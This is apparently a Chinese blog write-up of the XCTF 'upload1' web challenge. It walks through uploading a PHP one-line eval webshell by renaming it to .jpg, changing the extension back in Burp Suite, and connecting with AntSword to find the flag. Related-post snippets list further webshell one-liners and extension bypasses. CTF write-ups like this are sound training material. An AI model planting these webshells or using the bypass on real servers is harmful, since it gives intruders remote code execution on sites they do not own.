攻防世界-upload1-(详细操作)做题笔记

已于 2022-06-20 23:08:22 修改
阅读量7.2k 收藏 45
点赞数 14
分类专栏: 攻防世界 web 高手篇 文章标签: php 开发语言
于 2022-06-14 11:53:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43715020/article/details/125274195
版权

为了让自己记忆更深刻,查询跟资料更方便,开始试着写博客,新手菜鸟,思路有不正确的地方,还请各位大佬不吝啬指正,感谢。下面开始做题:

 进去题目已有提示需要上传文件

这种情况一般是构建一句话木马,利用burpsuite修改包后缀名(一般会限制上传文件类型),上传成功以后注意文件位置,利用菜刀或者是中国蚁剑进行连接, 然后获得flag,这就是具体的思路,下面我们开始实际操作,先构建我们需要的一句话木马:

<?php 
@eval($_POST['123']);
echo('123');
?>

构建的木马放在upload1.txt文本中

然后更改文件的格式,改为jpg上传

点击上传以后数据包会被burpsuite拦截,

 将拦截的后缀名jpg更改为php,burpsuite点击forword上传以后一句话木马就上传成功了,观察上传木马的后缀名可以得到该后缀名为php,说明修改成功了。

进入到文件路径

http://111.200.241.244:56304/upload/1655177536.upload1.php可以查看木马是否上传成功

文件返回值123,在该路径下文件返回了123,说明文件起了作用,现在可以打开中国蚁剑进行连接,在该页面下点击鼠标右键,再点击添加数据

 在URL地址哪里需要填写上传木马的详细路径,不然就无法连接成功。密码为eval($_POST['123'])的中的123

双击新的连接就可以进去web段。

 

 进入网站以后就可以获得文件的访问权限,自己慢慢找文档就可以了,一般在根目录下面可以,或者是www点网站下面可以找到需要的flag

 

角一角
关注
  • 14
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 upload1 解题思路
xj28555的博客
07-13 1178
进入题目 看到文件上传,那么肯定第一想法就是想的传一个木马上去。写好保存 提示说要提交图片文件,因为以弹窗的形式且反应速度较快,那么我猜测它是前端检测文件,所以我们可以先用bp绕过试一试,不行我们在用骚姿势。首先先把我们的1.php文件改成1.png,然后上传用bp拦截。 把后缀名改回php然后把包放出去。 发现上传成功,接下来就是用菜刀或者蚁剑连接我们的木马了。 在html目录里面发现flag ...
[极客大挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
upload(1~10)
ljj20020718的博客
11-27 405
文件上传之upload-labs
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)
Onlyone_1314的博客
11-23 4612
目录标题(1)把οnchange="check();去掉(2)禁用浏览器的JS脚本运行(3)Burp Suite抓包修改文件后缀名POST方法一句话木马GET方法一句话木马蚁剑连接 打开题目地址: 是一个文件上传的题目 选择一个一句话脚本上传: 前端存在JS代码校验文件类型,如果上传的文件后缀不是jpg和png,就会让上传按钮变得不使能: 要绕过前端的JS代码校验,常见的方法有: (1)把οnchange="check();去掉 可以直接把οnchange="check();去掉,这样提交文件的时候就
攻防世界Web新手题 upload1
最新发布
qq_52481261的博客
06-11 637
对于木马首先则是需要学会使用一句话木马,木马最根本的作用就是控制网站,不同的命令会导致测试链接的密码不一致又或者有的命令在上传后会有回显,以下是两句木马均可用于制作上传,不过一个测试密码为123,一个测试密码为attack。上传木马后对网站进行抓包,并将图片后缀名修改为php,点击forward提交,返回页面查看上传文件若显示为php则修改成功。遇到文件上传问题我们应该想到上传木马并渗透控制网站,在网站根目录中找到我们想要的信息。输入文件上传后的网址以及木马中的提交密码进行连接。空白界面右键点击添加数据。
upload 1--10题解题步骤
2301_80548709的博客
11-18 289
数据类型的黑名单验证突破又主要是例如:大小写绕过, .号绕过, 空格绕过, ::$DATA绕过, 双写绕过等。这里content-type判定的不符合我们的要求,那我们就将其改一下,因为他希望我们上传图片。但是我们可以操作后缀更改,上图中就没有对空格的去除所以我会在burp中加上一个空格。二.我们经历了前端验证,现在就要开始后端验证了,而后端验证很多都可以改文件名跳过,我们发现全都检查了,我们还可以 . . 的方法,因为他们只检查一次。首先,我们选择一个.php的文件上传。所以,我改一下上传,
攻防世界upload1
bjml_的博客
11-06 726
攻防世界upload1
攻防世界CTF题:upload1
Aixwei的博客
04-11 1007
发现这里有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片类型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
xctf攻防世界 upload1
m0_71282722的博客
05-08 207
此时将木马文件后缀改为jpg,一会再用bp改过来。查看flag.php 找到flag。第二种上传方式:使用bp绕过。第一种:前端绕过,删除约束。此时能上传php文件了。
CTF-WEB篇 攻防世界题目实战解析upload1
2301_76565920的博客
04-22 1002
题目:upload 知识点:一句话木马,webshell,burpsuite拦截并修改数据包
upload1-攻防世界
Fisher
08-08 250
wu
攻防世界-Web-upload1
Welcome To Myon'Blog !
03-27 267
一句话木马,文件上传,绕过,PHP,抓包改包放包,burp使用,蚁剑用法
攻防世界-WEB-upload1
Lucifer的专栏
09-09 310
必须上传图片,F12审计一下代码。得到上传成功的文件,请求文件名。get成功,证明文件已经上传。一句话木马,使用菜刀连接。通过bp修改文件类型。
攻防世界】十一、upload1
Hi~ 土拨鼠
09-15 500
步骤 打开所给场景,发现可以上传文件,尝试进行上传一句话木马: <?php @eval($_REQUEST['a']); echo "执行成功"; ?> 发现提示只能上传图片,点击确定后发现文件已经选中,但是提交按钮却不能点击: 一看就是通过前端js脚本进行校验了,这样就很简单了,两种方法: 第一种:简单粗暴,直接进入控制台,点击设置,禁用JavaScript 刷新,重新选中一句话木马,发现可以提交 上传成功,发现上传的路径已经显示,进行访问 在这里卡了好久,我一直尝试进行传入参数.
攻防世界 题库 web upload1 GFSJ0236
m0_52738557的博客
08-18 1571
这道题正如题目一样是一道简单的文件上传题难度:2类型:web 文件上传漏洞本文工具:firefox(浏览题目) burp(抓包、改包) 中国菜刀(控制服务器)1、我们点开链接来看题哦吼简单来分析一下题干,有两个按钮一个写着浏览…一个写着上传,中间提示着未选择文件,根据平时的习惯我们能够了解到,那个浏览应该就是在本地中查找文件上传的位置,选择好后中间的未选择文件应该就会变成所选择的文件的名称的相关提示,之后点击上传我们的文件就能上传上去了。......
攻防世界Web “warmup、NewsCenter、upload1”题解
qq_53325209的博客
04-25 3075
攻防世界Web “warmup、NewsCenter、upload1”题解。
攻防世界(高手进阶区)——upload1
知足且坚定,温柔且上进
02-12 1353
前提: 打开页面,知道此题是关于文件上传漏洞的,打开源代码,提示只能上传jpg结尾的图片,于是我通过UltraEdit将一句话木马编辑到一张图片,进行文件上传,虽然页面提示上传成功,但是我用蚁剑连接总是不成功,于是有了后面的操作。。。。。。 经过思索,我发现以上操作在此题没有必要,(其实上面操作可以利用简单的挂黑页操作) 我新建了一个含一句话木马的且后缀为jpg的文档,进行上传,进行抓包: 将...
攻防世界进阶upload
舞动的獾
07-05 5345
攻防世界进阶upload 注册登陆后,发现上传页面 试着上传一个文件3.php: 内容如下: <?php eval(@$_POST['a']); ?> 我们试着将它改个名字抓包,并且改为jpg,措辞测试发现只有jog能够传上去 虽然上传成功,但是并不能显示出文件名的位置,蚁剑连接失败 看到回显名称有uid号,无奈的丝毫没有头绪 只好看了大佬的博客,竟然是注入,文件名称注入 当...
XCTF攻防世界web进阶练习_ 4_upload
silence1_的博客
05-01 2406
XCTF攻防世界web进阶练习—upload 题目 题目为updoad,是上传的意思,应该是文件上传相关题目 打开题目,不出意料,要求上传文件。 这里先试着随便上传一个php文件,试试水 弹出一个弹窗,提示要求上传一个图片 注意:这里是弹窗提示,所以考虑是js过滤。 所以传入一个内容为php,后缀为jpg文件上传,用burp抓包 将filename改为pino.php,内容为echo phpi...
攻防世界upload1
07-28
抱歉,我无法回答这个问题。 #### 引用[.reference_title] - *1* [攻防世界-upload1-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125274195)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值